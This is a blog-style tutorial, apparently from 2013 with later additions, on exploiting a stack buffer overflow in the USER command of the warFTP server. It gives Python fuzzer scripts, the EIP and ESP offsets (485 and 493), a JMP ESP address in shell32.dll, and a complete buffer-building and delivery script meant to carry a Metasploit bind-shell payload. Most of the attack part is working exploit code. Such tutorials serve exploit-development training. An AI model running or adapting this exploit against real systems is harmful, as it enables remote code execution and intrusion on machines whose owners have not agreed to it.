Monday, 15 April 2013

Buffer overflow: direct return (JMP ESP) exploit of the warFTP application

Open and start the warFTP application.

Test the connection to warFTP (the server should answer with its FTP banner):
nc 192.168.56.101 21


Create a fuzzer script with Python (the buffer is sent as the FTP USER name):
import socket

# 1000 x "A" (0x41): the value that will show up in the registers if the
# USER argument overflows a stack buffer
buffer = b"\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                          # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS ' + b'\r\n')
s.close()
print("Finish")
Send the fuzzer at the target and see whether the target crashes:
python fuzzftp.py
The target crashes, which means it is vulnerable to a buffer overflow (the crash alone does not yet prove the return address is controlled; the debugger confirms that next).
Open warFTP from OllyDbg to start debugging. Send the fuzzer again and see what happens.

EIP is overwritten with 0x41414141, the A characters. Now replace the A characters in the fuzzer with a unique cyclic pattern generated by Metasploit's pattern_create (./pattern_create.rb 1000), so that every 4-byte window of the buffer is distinct and a register value can be mapped back to an offset.

Open and start warFTP from OllyDbg again and send the fuzzer again. See what happens.

EIP is overwritten by the pattern created before.
Find the pattern offsets for EIP and ESP with Metasploit's pattern_offset. EIP holds 0x32714131, which read little-endian is the ASCII "1Aq2"; ESP points at the bytes "q4Aq5Aq...":
./pattern_offset.rb 32714131
The result for EIP is 485.
./pattern_offset.rb q4Aq5Aq
The result for ESP is 493.
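The two offsets can be reproduced offline. The following is an added example, not code from the original post, that re-implements the pattern_create / pattern_offset logic in Python: the pattern is the same "Aa0Aa1..." sequence Metasploit builds, and an 8-hex-digit argument is decoded as a little-endian DWORD the way pattern_offset.rb treats a register value.

```python
# Added example: Metasploit-style cyclic pattern and offset lookup.
import string
import struct


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern of `length` bytes.

    Each 3-char group is upper+lower+digit, so any 4-byte window of the
    first 20280 bytes is unique and maps back to a single offset.
    """
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def pattern_offset(value, length=1000):
    """Find `value` in the pattern and return its offset (-1 if absent).

    `value` is either the ASCII fragment seen at a register in the debugger
    (e.g. "q4Aq5Aq" at ESP) or the 8-hex-digit register contents
    (e.g. "32714131" from EIP), which is unpacked as a little-endian DWORD.
    Caveat: an 8-char fragment made only of hex digits (say "Aa0Aa1Aa")
    is ambiguous under this rule, as it is with the original tool.
    """
    if value.lower().startswith("0x"):
        value = value[2:]
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        value = struct.pack("<I", int(value, 16)).decode("ascii")
    return pattern_create(length).find(value)


if __name__ == "__main__":
    # The values the debugger showed for warFTP: EIP=0x32714131, ESP->"q4Aq5Aq"
    print("EIP offset:", pattern_offset("32714131"))   # 485
    print("ESP offset:", pattern_offset("q4Aq5Aq"))    # 493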
Edit the script and insert the EIP and ESP information. The four bytes at offset 485 are a placeholder (0x42424242, "BBBB") that should show up in EIP, and the 0xCC (INT3) bytes start at offset 493, where ESP will point:
import socket

buffer = b"\x90" * 485                       # filler up to the saved return address
buffer += b"\x42\x42\x42\x42"                # placeholder: EIP should read 0x42424242
buffer += b"\x90" * (493 - len(buffer))      # pad up to the offset ESP points at
buffer += b"\xCC" * (1000 - len(buffer))     # INT3s from ESP on; total length stays 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                          # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS ' + b'\r\n')
s.close()
print("Finish")

Send the fuzzer at the target and look at the result: EIP holds the placeholder bytes and ESP points at the 0xCC bytes, so both are now under control.

Next, find a JMP ESP instruction in the shell32.dll module with OllyDbg. A module address is used rather than a stack address because the stack position changes between runs, while the module's code does not (on this XP-era target, which has no ASLR).

Copy its address and insert it into the fuzzer script in little-endian byte order: the address 0x7CA58265 is written as "\x65\x82\xA5\x7C".
import socket

buffer = b"\x90" * 485                       # filler up to the saved return address
buffer += b"\x65\x82\xA5\x7C"                # 0x7CA58265: JMP ESP in shell32.dll, little-endian
buffer += b"\xCC" * (493 - len(buffer))      # gap between the return address and ESP
buffer += b"\xCC" * (1000 - len(buffer))     # INT3s at ESP: the debugger breaks here if the jump lands

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))
data = s.recv(1024)                          # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buffer + b'\r\n')
data = s.recv(1024)
s.send(b'PASS ' + b'\r\n')
s.close()
print("Finish")

Test the new fuzzer and look at the value of EIP: it should hold the JMP ESP address, and OllyDbg should break on the 0xCC (INT3) bytes at ESP, which proves the jump lands in attacker-controlled data.

Generate the payload with Metasploit's msfweb and insert it into the fuzzer script at the ESP offset (493), in place of the 0xCC bytes. In this case I will use a bind shell.
Send the fuzzer again and then telnet to the target on the bind shell's port. If successful, the terminal should look like this:
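The final buffer assembly, as an added example that is not part of the original post: it builds the 1000-byte USER argument for the layout found above (return address at offset 485, ESP at offset 493, JMP ESP at 0x7CA58265) and checks it before anything is sent. The payload here is a constructed stand-in (INT3 bytes), not the msfweb bind shell; the bad-byte list is an assumption (CR and LF end an FTP command line, NUL ends a C string) and should be confirmed against the target before a real payload is dropped in.

```python
# Added example: assemble and sanity-check the warFTP exploit buffer.
import socket
import struct

EIP_OFFSET = 485            # bytes before the saved return address
ESP_OFFSET = 493            # offset ESP points at when the RET executes
BUFFER_LEN = 1000           # same total length the fuzzer crashed with
JMP_ESP = 0x7CA58265        # JMP ESP found in shell32.dll with OllyDbg
# Assumed bad bytes: CR/LF terminate the USER line, NUL terminates a C string.
BAD_BYTES = b"\x00\x0a\x0d"


def build_buffer(payload, return_addr=JMP_ESP):
    """Return the USER argument: NOP sled, return address, pad, payload, filler."""
    ret = struct.pack("<I", return_addr)              # little-endian DWORD
    if set(ret) & set(BAD_BYTES):
        raise ValueError("return address 0x%08x contains a bad byte" % return_addr)
    if set(payload) & set(BAD_BYTES):
        raise ValueError("payload contains a bad byte; re-encode it")
    room = BUFFER_LEN - ESP_OFFSET
    if len(payload) > room:
        raise ValueError("payload is %d bytes, only %d fit after ESP" % (len(payload), room))
    buf = b"\x90" * EIP_OFFSET
    buf += ret
    buf += b"\x90" * (ESP_OFFSET - len(buf))          # gap between RET and ESP
    buf += payload                                    # lands exactly at ESP
    buf += b"\xCC" * (BUFFER_LEN - len(buf))          # keep the crash length
    return buf


def layout(buf):
    """Return (return_addr, first 4 bytes at ESP) for an offline layout check."""
    ret = struct.unpack("<I", buf[EIP_OFFSET:EIP_OFFSET + 4])[0]
    return ret, buf[ESP_OFFSET:ESP_OFFSET + 4]


def send_exploit(buf, host="192.168.56.101", port=21):
    """Deliver the buffer the same way the post's script does: USER, then PASS."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)                                      # FTP banner
    s.send(b"USER " + buf + b"\r\n")
    s.recv(1024)
    s.send(b"PASS \r\n")
    s.close()


if __name__ == "__main__":
    # Constructed stand-in payload (8 x INT3); replace with the bind shell.
    buf = build_buffer(b"\xCC" * 8)
    ret, at_esp = layout(buf)
    print("len=%d eip=0x%08x esp->%r" % (len(buf), ret, at_esp))
    send_exploit(buf)
```

The checks are what a practitioner wants before firing: the return address is packed rather than hand-typed, the payload is refused if it would not fit in the 507 bytes after ESP, and any byte that would cut the line short is caught before the server ever sees it.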



